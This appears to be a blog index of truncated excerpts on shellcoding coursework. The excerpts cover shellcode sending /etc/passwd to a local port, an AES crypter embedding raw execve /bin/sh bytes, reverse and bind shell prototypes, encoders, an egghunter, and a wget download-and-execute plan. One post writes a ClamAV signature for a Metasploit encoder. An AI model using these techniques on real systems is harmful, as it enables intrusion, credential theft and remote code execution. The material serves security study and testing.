danielsauder

Because it is so much fun I developed a shellcode, that reads /etc/passwd and then sends the content to 127.1.1.1 port 12345. And here it is: shellcode.c /* ; Author: Daniel Sauder ; Website: https://govolution.wordpress.com/about ; License http://creativecommons.org/licenses/by-sa/3.0/ ; Shellcode reads /etc/passwd and sends the content to 127.1.1.1 port 12345. ; The file can be…

This is the last one and it is about writing a crypter/decrypter. I used python and pycrypto for this task. The execve shellcode starts a shell. The scripts use AES for encryption and decryption. Here is the code for encryption: encode.py from Crypto.Cipher import AES plain=("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80") obj=AES.new(‘Passphrase123456’, AES.MODE_CBC, ‘IVIVIVIVIVI12345’) l=len(plain) r=l%16 p=16-r print "offset: "…

This assignment is about writing polymorphic versions of shellcodes downloaded by shell-storm.org. Kill all Processes Shellcode I want to start with a simple one, a shellcode for killing processes which can be found at http://www.shell-storm.org/shellcode/files/shellcode-212.php. Here is the original assembler code: killall_orig.nasm section .text global _start _start: ; kill(-1, SIGKILL) push byte 37 pop eax…

Assignment five is about analyzing three different shellcodes, created with msfpayload for Linux/x86. linux/x86/exec I choosed the linux/x86/exec shellcode as first example. With: $ msfpayload linux/x86/exec cmd=”ls” R | ndisasm -u – it is possible to disassemble the shellcode: 00000000 6A0B push byte +0xb 00000002 58 pop eax 00000003 99 cdq 00000004 52 push edx…

This one is about building a custom encoder and decoder. For this I used an insertion / XOR encoder, that splits the shellcode into bytes and inserts a random value. Further the shellcode is decoded using xor with the random value. This way, we have a shellcode, that has nothing to do with the original…

This assignment is about writing a working demo of an egghunter. An egghunter code is basically a piece of code that is searching for a code word (the egg) in the memory. When the egg was found, the egghunter code jumps to the address behind the egg and executes the code at this address. For…

What it is about: •  Create a Shell_Reverse_TCP shellcode – Reverse connects to configured IP and Port – Execs shell on successful connection •  IP and Port should be easily configurable Here is the C code I used for prototyping the assembler code: reverseshellds.c #include <unistd.h> #include <string.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> int main(void) {…

What it is about: •  Create a Shell_Bind_TCP shellcode – Binds to a port – Execs Shell on incoming connection •  Port number should be easily configurable Here is the C code for the bind shell, I used it for modelling the assembler code: bindshellds.c #include <unistd.h> #include <string.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> int main(void)…

Trivia: Shikata ga nai is Japanese and means something like “nothing can be done about it”. https://en.wikipedia.org/wiki/Shikata_ga_nai Learning is always fun and I was playing around with making ClamAV signatures. I wondered if it is possible to write a signature that matches the famous Shikata-Ga-Nai shellcode encoder shipping with metasploit. After all I succeeded to…

After completing the tasks for the SLEA certification, I went on writing a shellcode for downloading and executing a file. For this task I wanna use wget with execve. But first, some pseudocode: start execve wget file_x chmod +x file_x execve file_x end So that is the plan. See a problem here? Look at the…